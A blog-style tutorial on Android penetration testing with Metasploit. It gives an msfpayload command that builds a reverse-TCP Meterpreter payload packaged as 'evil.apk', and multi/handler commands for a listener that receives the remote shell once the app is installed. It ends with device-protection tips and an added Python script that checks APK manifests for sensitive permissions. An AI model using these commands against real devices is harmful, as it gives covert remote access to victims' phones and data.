Android Penetration Testing Using Metasploit Framework

Android devices have become quite ubiquitous, and their usage is increasing with every passing second. So is our dependency on them. The security of Android devices, though, has always been questionable, and we all keep lots of private data on them. Hence penetration testing Android devices is an interesting topic to me. In this post I will show you how to penetration test any Android device using just the Metasploit Framework on your Kali Linux.


Android is Linux-based, and its applications are generally distributed in the .apk format, whose contents can be viewed by unzipping the file with WinRAR. APK stands for Android Application Package file and is used for distributing and installing applications on Android devices.

Android Penetration testing With Metasploit

Requirements:
  • Metasploit Framework.
  • Android smartphone or an Android emulator.
Step 1: Create a malicious APK file. Metasploit ships with everything you need to create a malicious APK file.
Command : msfpayload android/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=443 R > evil.apk
Explanation: This command creates a reverse TCP payload (the victim will establish a reverse connection to the attacker over TCP on the specified IP address and port number).

Step 2: Set up a listener. Since we just created a malicious Android application that will establish a reverse TCP connection, on the attacker side we need to set up a Metasploit listener that will be there to accept the connection.
Command :
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 443
exploit
Multi/Handler is a stub that is able to handle the connect-backs of almost all Metasploit payloads. With the above commands, we just set up a "listener" for the Metasploit-generated malicious application (evil.apk) to connect back to the attacker. It is here that we expect to get a Meterpreter shell if all went right.
Now all is set! All one needs to do is install and start the malicious application on an Android device or an emulator and see what useful information we can get from this application.

How to Protect Your Android Device:

  • Don't install APKs from unknown sources.
  • Make sure the "Install Applications From Unknown Sources" option in the Settings menu is disabled.
  • Use antivirus protection from a good vendor.
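
One way to act on the first point before installing a sideloaded APK, as an added example that is not part of the original post: because an APK is a ZIP archive, the permission names in its binary AndroidManifest.xml can be read without installing it. The function names, the `SENSITIVE` set and the constructed sample are assumptions of this example, and the parser assumes the string pool directly follows the 8-byte file header.

```python
import io
import struct
import zipfile

# Editor's choice of "sensitive" permissions for this example, not from the post.
SENSITIVE = {"android.permission." + p for p in ("READ_SMS", "SEND_SMS", "RECORD_AUDIO", "CAMERA")}

def axml_strings(data):
    """Decode the string pool that follows the 8-byte header of a binary manifest."""
    ctype, hdr, _, count, _, flags, start, _ = struct.unpack_from("<HHIIIIII", data, 8)
    if ctype != 0x0001:
        raise ValueError("string pool chunk not found")
    out = []
    for off in struct.unpack_from("<%dI" % count, data, 8 + hdr):
        p = 8 + start + off
        if flags & 0x100:                       # UTF-8 pool
            p += 2 if data[p] & 0x80 else 1     # skip the character count
            n, w = data[p], 1                   # byte length is 1 or 2 bytes wide
            if n & 0x80:
                n, w = ((n & 0x7F) << 8) | data[p + 1], 2
            out.append(data[p + w:p + w + n].decode("utf-8", "replace"))
        else:                                   # UTF-16 pool
            n, w = struct.unpack_from("<H", data, p)[0], 2
            if n & 0x8000:
                n, w = ((n & 0x7FFF) << 16) | struct.unpack_from("<H", data, p + 2)[0], 4
            out.append(data[p + w:p + w + 2 * n].decode("utf-16-le", "replace"))
    return out

def triage_apk(apk_bytes):
    """List the archive entries and the permission names the manifest refers to."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        strings = axml_strings(z.read("AndroidManifest.xml"))
    perms = sorted({s for s in strings if s.startswith("android.permission.")})
    return {"files": names, "permissions": perms,
            "sensitive": [p for p in perms if p in SENSITIVE]}

def sample_apk():
    """Constructed sample: a ZIP with a string-pool-only manifest, not a real app."""
    strs = ["android.permission.INTERNET", "android.permission.READ_SMS", "manifest"]
    blobs = [struct.pack("<H", len(s)) + s.encode("utf-16-le") + b"\0\0" for s in strs]
    offs = [sum(len(b) for b in blobs[:i]) for i in range(len(blobs))]
    start = 28 + 4 * len(strs)                  # pool header plus offset table
    pool = struct.pack("<HHIIIIII", 1, 28, start + sum(map(len, blobs)), len(strs), 0, 0, start, 0)
    pool += struct.pack("<%dI" % len(strs), *offs) + b"".join(blobs)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", struct.pack("<HHI", 3, 8, 8 + len(pool)) + pool)
    return buf.getvalue()
```

An APK whose manifest names sensitive permissions that its stated purpose does not need is a reason not to install it.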
